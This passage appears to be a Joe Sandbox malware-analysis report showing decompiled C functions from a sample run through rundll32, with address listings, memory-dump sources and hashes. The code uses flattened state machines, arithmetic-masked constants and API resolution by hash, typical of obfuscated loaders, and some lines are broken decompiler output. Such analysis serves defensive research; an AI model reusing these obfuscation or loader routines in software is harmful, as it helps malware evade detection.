				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t218;
				signed int _t219;
				void* _t225;
				void* _t246;
				intOrPtr _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr* _t259;
				signed int _t260;
				signed int* _t261;

				_t261 =  &_v100;
				_v12 = 0xf244e3;
				_v8 = 0x291d6d;
				_t225 = 0x37f2dd7;
				_t251 = 0;
				_v4 = 0;
				_v68 = 0x555e8d;
				_v68 = _v68 + 0xfffff532;
				_v68 = _v68 | 0x235b50f0;
				_v68 = _v68 ^ 0x235e53ff;
				_v84 = 0xf72ec;
				_v84 = _v84 >> 7;
				_t252 = 0x19;
				_v84 = _v84 / _t252;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x000f09df;
				_v20 = 0xee8389;
				_t253 = 0x51;
				_v20 = _v20 * 0x29;
				_v20 = _v20 ^ 0x2635dc09;
				_v88 = 0xea545e;
				_t30 =  &_v88; // 0xea545e
				_v88 =  *_t30 / _t253;
				_t36 =  &_v88; // 0xea545e
				_t254 = 0x7a;
				_v88 =  *_t36 * 0x1c;
				_v88 = _v88 + 0xc9a8;
				_v88 = _v88 ^ 0x005db592;
				_v24 = 0x448750;
				_v24 = _v24 / _t254;
				_v24 = _v24 ^ 0x000cab3c;
				_v28 = 0x8cea36;
				_v28 = _v28 * 0x38;
				_v28 = _v28 ^ 0x1eda9ad9;
				_v100 = 0x8110ba;
				_v100 = _v100 + 0x3ab9;
				_v100 = _v100 ^ 0x336ca884;
				_v100 = _v100 + 0xffff8c66;
				_v100 = _v100 ^ 0x33e0711c;
				_v64 = 0x5ca85e;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0x000b11ab;
				_v44 = 0x2bb2b6;
				_v44 = _v44 | 0xbbfbcd5f;
				_v44 = _v44 ^ 0xbbf16182;
				_v72 = 0x855f4c;
				_v72 = _v72 ^ 0x87656771;
				_v72 = _v72 * 0x71;
				_v72 = _v72 ^ 0xf9f8e59a;
				_v96 = 0x938339;
				_v96 = _v96 << 8;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xcc040e17;
				_v96 = _v96 ^ 0x50841052;
				_v40 = 0xbe1d32;
				_v40 = _v40 + 0x9b9c;
				_v40 = _v40 ^ 0x00bc2d0e;
				_v56 = 0x9e5686;
				_v56 = _v56 + 0xffffd134;
				_v56 = _v56 + 0xffff1440;
				_v56 = _v56 ^ 0x0091c9b6;
				_v60 = 0xb7e614;
				_v60 = _v60 << 3;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00065aea;
				_v32 = 0x537989;
				_v32 = _v32 + 0xffff7fce;
				_v32 = _v32 ^ 0x005430a6;
				_v92 = 0x1586eb;
				_t255 = 0x27;
				_v92 = _v92 * 0x18;
				_v92 = _v92 >> 7;
				_v92 = _v92 * 0x26;
				_v92 = _v92 ^ 0x009f543a;
				_v52 = 0xc32f0b;
				_v52 = _v52 | 0xcd8d244f;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0cd427c3;
				_v36 = 0xd9cf6a;
				_v36 = _v36 / _t255;
				_v36 = _v36 ^ 0x000f5a1a;
				_v16 = 0xbb623f;
				_v16 = _v16 ^ 0xe760556d;
				_v16 = _v16 ^ 0xe7dfff62;
				_v76 = 0x7fa35c;
				_v76 = _v76 >> 0xa;
				_v76 = _v76 + 0xffff049d;
				_v76 = _v76 ^ 0x38c60922;
				_v76 = _v76 ^ 0xc73f93c8;
				_v80 = 0x34ea16;
				_v80 = _v80 | 0x70dfffff;
				_t256 = 0x78;
				_t257 = _v16;
				_t260 = _v16;
				_t224 = _v16;
				_v80 = _v80 / _t256;
				_v80 = _v80 ^ 0x00f0b2be;
				_v48 = 0x2ab377;
				_v48 = _v48 << 0xd;
				_v48 = _v48 + 0x21bb;
				_v48 = _v48 ^ 0x5663e2ae;
				while(1) {
					L1:
					_push(0x5c);
					while(_t225 != 0xb8820d) {
						if(_t225 == 0x1effdba) {
							_t219 = E002D912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
							_t224 = _t219;
							_t261 =  &(_t261[5]);
							if(_t219 != 0) {
								_t225 = 0xb9a00d9;
								goto L11;
							}
						} else {
							if(_t225 == 0x37f2dd7) {
								_t225 = 0x43cb3ac;
								continue;
							} else {
								if(_t225 == 0x43cb3ac) {
									_t258 =  *0x2f3e10; // 0x0
									_t259 = _t258 + 0x1c;
									while( *_t259 != _t246) {
										_t259 = _t259 + 2;
									}
									_t257 = _t259 + 2;
									_t225 = 0x1effdba;
									goto L12;
								} else {
									if(_t225 == 0x5d9bea5) {
										E002E8F9E(_v32, _v92, _v52, _v36, _t260);
										_t261 =  &(_t261[3]);
										_t225 = 0xb8820d;
										goto L11;
									} else {
										if(_t225 == _t218) {
											E002DE249(_v96, _t260, _v40, _v56, _v60);
											_t261 =  &(_t261[3]);
											_t251 =  !=  ? 1 : _t251;
											_t225 = 0x5d9bea5;
											L11:
											_t246 = 0x5c;
											L12:
											_t218 = 0x9850ebe;
											continue;
										} else {
											if(_t225 != 0xb9a00d9) {
												L22:
												if(_t225 != 0x8a80d0f) {
													continue;
												}
											} else {
												_t260 = E002D42C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
												_t261 =  &(_t261[5]);
												_t218 = 0x9850ebe;
												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
												goto L1;
											}
										}
									}
								}
							}
						}
						return _t251;
					}
					E002E8F9E(_v16, _v76, _v80, _v48, _t224);
					_t261 =  &(_t261[3]);
					_t225 = 0x8a80d0f;
					_t218 = 0x9850ebe;
					_t246 = 0x5c;
					goto L22;
				}
			}











































                                                                                                                                  0x002e473c
                                                                                                                                  0x002e473f
                                                                                                                                  0x002e4749
                                                                                                                                  0x002e4751
                                                                                                                                  0x002e475a
                                                                                                                                  0x002e475c
                                                                                                                                  0x002e4760
                                                                                                                                  0x002e4768
                                                                                                                                  0x002e4770
                                                                                                                                  0x002e4778
                                                                                                                                  0x002e4780
                                                                                                                                  0x002e4788
                                                                                                                                  0x002e4793
                                                                                                                                  0x002e4798
                                                                                                                                  0x002e479e
                                                                                                                                  0x002e47a3
                                                                                                                                  0x002e47ab
                                                                                                                                  0x002e47b8
                                                                                                                                  0x002e47bb
                                                                                                                                  0x002e47bf
                                                                                                                                  0x002e47c7
                                                                                                                                  0x002e47cf
                                                                                                                                  0x002e47d7
                                                                                                                                  0x002e47db
                                                                                                                                  0x002e47e0
                                                                                                                                  0x002e47e1
                                                                                                                                  0x002e47e5
                                                                                                                                  0x002e47ed
                                                                                                                                  0x002e47f5
                                                                                                                                  0x002e4803
                                                                                                                                  0x002e4807
                                                                                                                                  0x002e480f
                                                                                                                                  0x002e481c
                                                                                                                                  0x002e4820
                                                                                                                                  0x002e4828
                                                                                                                                  0x002e4830
                                                                                                                                  0x002e4838
                                                                                                                                  0x002e4840
                                                                                                                                  0x002e4848
                                                                                                                                  0x002e4850
                                                                                                                                  0x002e4858
                                                                                                                                  0x002e4862
                                                                                                                                  0x002e4866
                                                                                                                                  0x002e486e
                                                                                                                                  0x002e4876
                                                                                                                                  0x002e487e
                                                                                                                                  0x002e4886
                                                                                                                                  0x002e488e
                                                                                                                                  0x002e489b
                                                                                                                                  0x002e489f
                                                                                                                                  0x002e48a7
                                                                                                                                  0x002e48af
                                                                                                                                  0x002e48b4
                                                                                                                                  0x002e48b9
                                                                                                                                  0x002e48c1
                                                                                                                                  0x002e48c9
                                                                                                                                  0x002e48d1
                                                                                                                                  0x002e48d9
                                                                                                                                  0x002e48e1
                                                                                                                                  0x002e48e9
                                                                                                                                  0x002e48f1
                                                                                                                                  0x002e48f9
                                                                                                                                  0x002e4901
                                                                                                                                  0x002e4909
                                                                                                                                  0x002e4910
                                                                                                                                  0x002e4915
                                                                                                                                  0x002e491d
                                                                                                                                  0x002e4925
                                                                                                                                  0x002e492d
                                                                                                                                  0x002e4935
                                                                                                                                  0x002e4944
                                                                                                                                  0x002e4947
                                                                                                                                  0x002e494b
                                                                                                                                  0x002e4955
                                                                                                                                  0x002e4959
                                                                                                                                  0x002e4961
                                                                                                                                  0x002e4969
                                                                                                                                  0x002e4971
                                                                                                                                  0x002e4976
                                                                                                                                  0x002e497e
                                                                                                                                  0x002e498e
                                                                                                                                  0x002e4992
                                                                                                                                  0x002e499a
                                                                                                                                  0x002e49a2
                                                                                                                                  0x002e49aa
                                                                                                                                  0x002e49b2
                                                                                                                                  0x002e49ba
                                                                                                                                  0x002e49bf
                                                                                                                                  0x002e49c7
                                                                                                                                  0x002e49cf
                                                                                                                                  0x002e49d7
                                                                                                                                  0x002e49df
                                                                                                                                  0x002e49eb
                                                                                                                                  0x002e49ee
                                                                                                                                  0x002e49f2
                                                                                                                                  0x002e49f6
                                                                                                                                  0x002e49fa
                                                                                                                                  0x002e4a03
                                                                                                                                  0x002e4a0b
                                                                                                                                  0x002e4a13
                                                                                                                                  0x002e4a18
                                                                                                                                  0x002e4a20
                                                                                                                                  0x002e4a28
                                                                                                                                  0x002e4a28
                                                                                                                                  0x002e4a28
                                                                                                                                  0x002e4a2b
                                                                                                                                  0x002e4a3d
                                                                                                                                  0x002e4b36
                                                                                                                                  0x002e4b3b
                                                                                                                                  0x002e4b3d
                                                                                                                                  0x002e4b42
                                                                                                                                  0x002e4b44
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4b44
                                                                                                                                  0x002e4a43
                                                                                                                                  0x002e4a49
                                                                                                                                  0x002e4b16
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4a4f
                                                                                                                                  0x002e4a55
                                                                                                                                  0x002e4af9
                                                                                                                                  0x002e4aff
                                                                                                                                  0x002e4b07
                                                                                                                                  0x002e4b04
                                                                                                                                  0x002e4b04
                                                                                                                                  0x002e4b0c
                                                                                                                                  0x002e4b0f
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4a5b
                                                                                                                                  0x002e4a61
                                                                                                                                  0x002e4aea
                                                                                                                                  0x002e4aef
                                                                                                                                  0x002e4af2
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4a63
                                                                                                                                  0x002e4a65
                                                                                                                                  0x002e4ab7
                                                                                                                                  0x002e4abe
                                                                                                                                  0x002e4ac4
                                                                                                                                  0x002e4ac7
                                                                                                                                  0x002e4acc
                                                                                                                                  0x002e4ace
                                                                                                                                  0x002e4acf
                                                                                                                                  0x002e4acf
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4a67
                                                                                                                                  0x002e4a6d
                                                                                                                                  0x002e4b71
                                                                                                                                  0x002e4b77
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4a73
                                                                                                                                  0x002e4a8f
                                                                                                                                  0x002e4a91
                                                                                                                                  0x002e4a9b
                                                                                                                                  0x002e4aa0
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4aa0
                                                                                                                                  0x002e4a6d
                                                                                                                                  0x002e4a65
                                                                                                                                  0x002e4a61
                                                                                                                                  0x002e4a55
                                                                                                                                  0x002e4a49
                                                                                                                                  0x002e4b86
                                                                                                                                  0x002e4b86
                                                                                                                                  0x002e4b5c
                                                                                                                                  0x002e4b61
                                                                                                                                  0x002e4b64
                                                                                                                                  0x002e4b69
                                                                                                                                  0x002e4b70
                                                                                                                                  0x00000000
                                                                                                                                  0x002e4b70

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ^T$mU`
                                                                                                                                  • API String ID: 0-1245783925
                                                                                                                                  • Opcode ID: 1decdf600921c8786d0583e8c1f2aed5f8152c6794b34bf2c2c7af9cd0023f01
                                                                                                                                  • Instruction ID: fd4cbc5e929e86af3409efe7e005be5d23c257e08aaf45350ba4486e7f9311df
                                                                                                                                  • Opcode Fuzzy Hash: 1decdf600921c8786d0583e8c1f2aed5f8152c6794b34bf2c2c7af9cd0023f01
                                                                                                                                  • Instruction Fuzzy Hash: B4B141715183419FC318DF26899A41BFBE1FBC8758F508A1DF69A96260D3B1CA19CF82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EA666 Relevance: 2.7, Strings: 2, Instructions: 214COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E002EA666(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t185;
				void* _t187;
				signed int _t194;
				signed int _t203;
				intOrPtr* _t204;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				signed int _t239;
				signed int* _t240;

				_t204 = __ecx;
				_t240 =  &_v208;
				_v144 = __ecx;
				_v188 = 0x57b051;
				_v188 = _v188 ^ 0x0e33ee27;
				_v188 = _v188 * 0x1d;
				_t236 = 0xac5721c;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x15e508b7;
				_v156 = 0xb3c586;
				_v156 = _v156 + 0xc4f5;
				_v156 = _v156 ^ 0x00bed25a;
				_v168 = 0x711032;
				_v168 = _v168 << 8;
				_v168 = _v168 + 0x5169;
				_v168 = _v168 ^ 0x711dace8;
				_v192 = 0xa2549d;
				_v192 = _v192 + 0x52ae;
				_v192 = _v192 >> 1;
				_v192 = _v192 >> 3;
				_v192 = _v192 ^ 0x000eb53b;
				_v140 = 0xe7e5a1;
				_t231 = 0x32;
				_v140 = _v140 * 0x50;
				_v140 = _v140 ^ 0x4874e895;
				_v208 = 0x1967bb;
				_v208 = _v208 << 4;
				_v208 = _v208 | 0x201d9a42;
				_v208 = _v208 / _t231;
				_v208 = _v208 ^ 0x00a7f54f;
				_v152 = 0x52a7fc;
				_v152 = _v152 + 0x45a2;
				_v152 = _v152 ^ 0x0052edd3;
				_v160 = 0x3027b3;
				_v160 = _v160 + 0xfd14;
				_v160 = _v160 ^ 0x0036c553;
				_v180 = 0x38862e;
				_v180 = _v180 ^ 0x0f350481;
				_t232 = 0x7c;
				_v180 = _v180 * 0x65;
				_v180 = _v180 ^ 0xf053ee57;
				_v136 = 0x356a19;
				_v136 = _v136 ^ 0xbed63dcb;
				_v136 = _v136 ^ 0xbeeb3706;
				_v164 = 0x14aaf;
				_v164 = _v164 + 0xffffc1af;
				_v164 = _v164 ^ 0x000285a1;
				_v200 = 0x7f3e04;
				_v200 = _v200 * 0x53;
				_v200 = _v200 + 0xffffdc1b;
				_v200 = _v200 + 0x69f9;
				_v200 = _v200 ^ 0x2945b47b;
				_v148 = 0xc6ed1e;
				_v148 = _v148 >> 6;
				_v148 = _v148 ^ 0x0006dab0;
				_v172 = 0x6d07b9;
				_v172 = _v172 / _t232;
				_t233 = 0x35;
				_v172 = _v172 / _t233;
				_v172 = _v172 ^ 0x00041e3e;
				_v204 = 0x57aab;
				_v204 = _v204 + 0xdcdc;
				_v204 = _v204 * 0x48;
				_v204 = _v204 << 8;
				_v204 = _v204 ^ 0xc89fb5e3;
				_v132 = 0xff84eb;
				_v132 = _v132 << 5;
				_v132 = _v132 ^ 0x1ff23c26;
				_v196 = 0xcb0ee1;
				_v196 = _v196 | 0xd8d8bfc1;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x8dbe7284;
				_v184 = 0x3f345e;
				_t234 = 0x7b;
				_v184 = _v184 * 0x5e;
				_v184 = _v184 ^ 0x1738d684;
				_v176 = 0x75d12f;
				_t239 = _v184;
				_t203 = _v184;
				_t235 = _v184;
				_v176 = _v176 / _t234;
				_v176 = _v176 + 0xb925;
				_v176 = _v176 ^ 0x0007fac1;
				while(1) {
					L1:
					_t185 = 0x80ddafd;
					do {
						while(_t236 != 0x3002390) {
							if(_t236 == _t185) {
								_push(_v204);
								_push(_v172);
								_t187 = E002EDCF7(_v148, 0x2d1540, __eflags);
								_push(_t235);
								_push( &_v128);
								_push(_t187);
								_push(_t239);
								_push(_t203);
								 *((intOrPtr*)(E002DA42D(0xab2a8d8a, 0x2b7)))();
								E002DA8B0(_v132, _t187, _v196);
								_t236 = 0xc2d90a2;
								goto L11;
							} else {
								if(_t236 == 0x94501ee) {
									_t194 = E002E0AE0(0x10, 1);
									_push(_v140);
									_t239 = _t194;
									_push( &_v128);
									_push(_t239);
									_push(0xb);
									E002D80E3(_v168, _v192);
									_t236 = 0x3002390;
									L11:
									_t240 =  &(_t240[6]);
									L12:
									_t204 = _v144;
									goto L1;
								} else {
									if(_t236 == 0xac5721c) {
										_t236 = 0x94501ee;
										continue;
									} else {
										if(_t236 == 0xc2d90a2) {
											E002E8519(_v184, _v176, _t235);
										} else {
											if(_t236 != 0xd4e1cec) {
												goto L17;
											} else {
												_t239 = 0x4000;
												_push(_t204);
												_push(_t204);
												_t203 = E002D7FF2(0x4000);
												_t185 = 0x80ddafd;
												_t204 = _v144;
												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
												continue;
											}
										}
									}
								}
							}
							L20:
							return _t203;
						}
						_t235 = E002D4816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
						_t240 =  &(_t240[4]);
						__eflags = _t235;
						if(__eflags == 0) {
							_t204 = _v144;
							_t236 = 0x99c1651;
							_t185 = 0x80ddafd;
							goto L17;
						} else {
							_t236 = 0xd4e1cec;
							goto L12;
						}
						goto L20;
						L17:
						__eflags = _t236 - 0x99c1651;
					} while (__eflags != 0);
					goto L20;
				}
			}





































                                                                                                                                  0x002ea666
                                                                                                                                  0x002ea666
                                                                                                                                  0x002ea670
                                                                                                                                  0x002ea674
                                                                                                                                  0x002ea67e
                                                                                                                                  0x002ea68b
                                                                                                                                  0x002ea68f
                                                                                                                                  0x002ea694
                                                                                                                                  0x002ea699
                                                                                                                                  0x002ea6a1
                                                                                                                                  0x002ea6a9
                                                                                                                                  0x002ea6b1
                                                                                                                                  0x002ea6b9
                                                                                                                                  0x002ea6c1
                                                                                                                                  0x002ea6c6
                                                                                                                                  0x002ea6ce
                                                                                                                                  0x002ea6d6
                                                                                                                                  0x002ea6de
                                                                                                                                  0x002ea6e6
                                                                                                                                  0x002ea6ea
                                                                                                                                  0x002ea6ef
                                                                                                                                  0x002ea6f7
                                                                                                                                  0x002ea706
                                                                                                                                  0x002ea709
                                                                                                                                  0x002ea70d
                                                                                                                                  0x002ea715
                                                                                                                                  0x002ea71d
                                                                                                                                  0x002ea722
                                                                                                                                  0x002ea732
                                                                                                                                  0x002ea736
                                                                                                                                  0x002ea73e
                                                                                                                                  0x002ea746
                                                                                                                                  0x002ea74e
                                                                                                                                  0x002ea756
                                                                                                                                  0x002ea75e
                                                                                                                                  0x002ea766
                                                                                                                                  0x002ea76e
                                                                                                                                  0x002ea776
                                                                                                                                  0x002ea783
                                                                                                                                  0x002ea786
                                                                                                                                  0x002ea78a
                                                                                                                                  0x002ea792
                                                                                                                                  0x002ea79a
                                                                                                                                  0x002ea7a2
                                                                                                                                  0x002ea7aa
                                                                                                                                  0x002ea7b2
                                                                                                                                  0x002ea7ba
                                                                                                                                  0x002ea7c2
                                                                                                                                  0x002ea7cf
                                                                                                                                  0x002ea7d3
                                                                                                                                  0x002ea7db
                                                                                                                                  0x002ea7e3
                                                                                                                                  0x002ea7eb
                                                                                                                                  0x002ea7f3
                                                                                                                                  0x002ea7f8
                                                                                                                                  0x002ea800
                                                                                                                                  0x002ea810
                                                                                                                                  0x002ea818
                                                                                                                                  0x002ea81b
                                                                                                                                  0x002ea81f
                                                                                                                                  0x002ea827
                                                                                                                                  0x002ea82f
                                                                                                                                  0x002ea83c
                                                                                                                                  0x002ea842
                                                                                                                                  0x002ea847
                                                                                                                                  0x002ea84f
                                                                                                                                  0x002ea857
                                                                                                                                  0x002ea85c
                                                                                                                                  0x002ea864
                                                                                                                                  0x002ea86c
                                                                                                                                  0x002ea874
                                                                                                                                  0x002ea879
                                                                                                                                  0x002ea881
                                                                                                                                  0x002ea890
                                                                                                                                  0x002ea891
                                                                                                                                  0x002ea895
                                                                                                                                  0x002ea89d
                                                                                                                                  0x002ea8ab
                                                                                                                                  0x002ea8af
                                                                                                                                  0x002ea8b3
                                                                                                                                  0x002ea8b7
                                                                                                                                  0x002ea8bb
                                                                                                                                  0x002ea8c3
                                                                                                                                  0x002ea8cb
                                                                                                                                  0x002ea8cb
                                                                                                                                  0x002ea8cb
                                                                                                                                  0x002ea8d0
                                                                                                                                  0x002ea8d0
                                                                                                                                  0x002ea8de
                                                                                                                                  0x002ea983
                                                                                                                                  0x002ea98c
                                                                                                                                  0x002ea994
                                                                                                                                  0x002ea99b
                                                                                                                                  0x002ea9a7
                                                                                                                                  0x002ea9a8
                                                                                                                                  0x002ea9a9
                                                                                                                                  0x002ea9aa
                                                                                                                                  0x002ea9b6
                                                                                                                                  0x002ea9c2
                                                                                                                                  0x002ea9c7
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea8e4
                                                                                                                                  0x002ea8ea
                                                                                                                                  0x002ea952
                                                                                                                                  0x002ea957
                                                                                                                                  0x002ea95f
                                                                                                                                  0x002ea969
                                                                                                                                  0x002ea96a
                                                                                                                                  0x002ea96b
                                                                                                                                  0x002ea96d
                                                                                                                                  0x002ea972
                                                                                                                                  0x002ea977
                                                                                                                                  0x002ea977
                                                                                                                                  0x002ea97a
                                                                                                                                  0x002ea97a
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea8ec
                                                                                                                                  0x002ea8f2
                                                                                                                                  0x002ea93f
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea8f4
                                                                                                                                  0x002ea8fa
                                                                                                                                  0x002eaa1d
                                                                                                                                  0x002ea900
                                                                                                                                  0x002ea906
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea90c
                                                                                                                                  0x002ea910
                                                                                                                                  0x002ea91f
                                                                                                                                  0x002ea920
                                                                                                                                  0x002ea926
                                                                                                                                  0x002ea930
                                                                                                                                  0x002ea936
                                                                                                                                  0x002ea93a
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea93a
                                                                                                                                  0x002ea906
                                                                                                                                  0x002ea8fa
                                                                                                                                  0x002ea8f2
                                                                                                                                  0x002ea8ea
                                                                                                                                  0x002eaa26
                                                                                                                                  0x002eaa2f
                                                                                                                                  0x002eaa2f
                                                                                                                                  0x002ea9e8
                                                                                                                                  0x002ea9ea
                                                                                                                                  0x002ea9ed
                                                                                                                                  0x002ea9ef
                                                                                                                                  0x002ea9f8
                                                                                                                                  0x002ea9fc
                                                                                                                                  0x002eaa01
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea9f1
                                                                                                                                  0x002ea9f1
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea9f1
                                                                                                                                  0x00000000
                                                                                                                                  0x002eaa06
                                                                                                                                  0x002eaa06
                                                                                                                                  0x002eaa06
                                                                                                                                  0x00000000
                                                                                                                                  0x002eaa12

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ^4?$iQ
                                                                                                                                  • API String ID: 0-3971506469
                                                                                                                                  • Opcode ID: fdcf2e6400a40f6aac6da010245ac6ff065029edf9c329bf17638fc17e71eb3a
                                                                                                                                  • Instruction ID: 9b405450af3014ee3b3e8082d3087bdbb16084b7104fb523d1cdf920f5ce38bb
                                                                                                                                  • Opcode Fuzzy Hash: fdcf2e6400a40f6aac6da010245ac6ff065029edf9c329bf17638fc17e71eb3a
                                                                                                                                  • Instruction Fuzzy Hash: E0A152719183809FC354CF2AD58990BFBE1BBC4758F80492DF99AA6260C7B5D9498F83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E8BE3 Relevance: 2.7, Strings: 2, Instructions: 204COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                  			E002E8BE3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v88;
				intOrPtr _v92;
				signed int _t203;
				short _t206;
				short _t211;
				signed int _t214;
				void* _t216;
				intOrPtr _t238;
				void* _t239;
				void* _t240;
				short* _t241;
				short* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				void* _t251;

				_v92 = 0x476c75;
				asm("stosd");
				_t216 = 0xb7209d2;
				_t243 = 0x73;
				asm("stosd");
				asm("stosd");
				_t238 =  *0x2f3e10; // 0x0
				_v16 = 0xe95677;
				_t239 = _t238 + 0x1c;
				_v16 = _v16 + 0xffffde88;
				_v16 = _v16 | 0xcd71b475;
				_v16 = _v16 + 0xffffb9cf;
				_v16 = _v16 ^ 0xcdf0e35f;
				_v48 = 0xdf79ef;
				_v48 = _v48 / _t243;
				_t244 = 0x6b;
				_v48 = _v48 * 0x6d;
				_v48 = _v48 ^ 0x00d012e0;
				_v20 = 0x9de8b4;
				_v20 = _v20 + 0xffff612d;
				_v20 = _v20 / _t244;
				_v20 = _v20 ^ 0xc642351f;
				_v20 = _v20 ^ 0xc646a40f;
				_v52 = 0x8fb5bf;
				_v52 = _v52 << 0xa;
				_v52 = _v52 | 0x07a5acc8;
				_v52 = _v52 ^ 0x3ff13d54;
				_v68 = 0x5451dc;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x054b95e9;
				_v56 = 0x52bd8b;
				_v56 = _v56 >> 2;
				_t245 = 0x43;
				_v56 = _v56 * 0x7a;
				_v56 = _v56 ^ 0x09d97bb2;
				_v24 = 0x3d3b88;
				_v24 = _v24 / _t245;
				_v24 = _v24 + 0xfffff551;
				_v24 = _v24 ^ 0x58fd9949;
				_v24 = _v24 ^ 0x58f7485b;
				_v28 = 0x8d7fa4;
				_v28 = _v28 | 0x74f1f66b;
				_v28 = _v28 + 0xbcb0;
				_t246 = 0x1d;
				_v28 = _v28 / _t246;
				_v28 = _v28 ^ 0x0406308a;
				_v76 = 0xb13dbd;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0001a54a;
				_v72 = 0x3dff58;
				_v72 = _v72 + 0xffff5d9c;
				_v72 = _v72 ^ 0x00301633;
				_v8 = 0xd63a62;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xdca434f7;
				_v8 = _v8 ^ 0xdd0cf0dc;
				_v44 = 0x6f20d8;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0xaa766a49;
				_v44 = _v44 ^ 0xaa79f73d;
				_v64 = 0x5810b3;
				_t247 = 0x3e;
				_v64 = _v64 * 0x13;
				_v64 = _v64 ^ 0x068d2e2f;
				_v60 = 0xa1705b;
				_v60 = _v60 / _t247;
				_v60 = _v60 ^ 0x000746d3;
				_v12 = 0xe49076;
				_v12 = _v12 | 0xf94b921d;
				_t248 = 0x66;
				_v12 = _v12 / _t248;
				_v12 = _v12 | 0x30c6fb91;
				_v12 = _v12 ^ 0x32fd72cc;
				_v40 = 0x4af1f5;
				_v40 = _v40 + 0xffff1f3a;
				_v40 = _v40 + 0x5998;
				_v40 = _v40 | 0x0efc634a;
				_v40 = _v40 ^ 0x0ef1d3e1;
				_v36 = 0xca0e2e;
				_v36 = _v36 + 0xa6ab;
				_v36 = _v36 * 0x17;
				_v36 = _v36 | 0xed84f45f;
				_v36 = _v36 ^ 0xffb3e96f;
				_v32 = 0x9f068d;
				_v32 = _v32 | 0xccdcedf7;
				_v32 = _v32 >> 8;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0xdfe821c7;
				do {
					while(_t216 != 0x5ccdb59) {
						if(_t216 == 0x80e5149) {
							_push(_v32);
							_push(_t239);
							_push(3);
							_push(1);
							E002D80E3(_v40, _v36);
							 *((short*)(_t239 + 6)) = 0;
							return 0;
						}
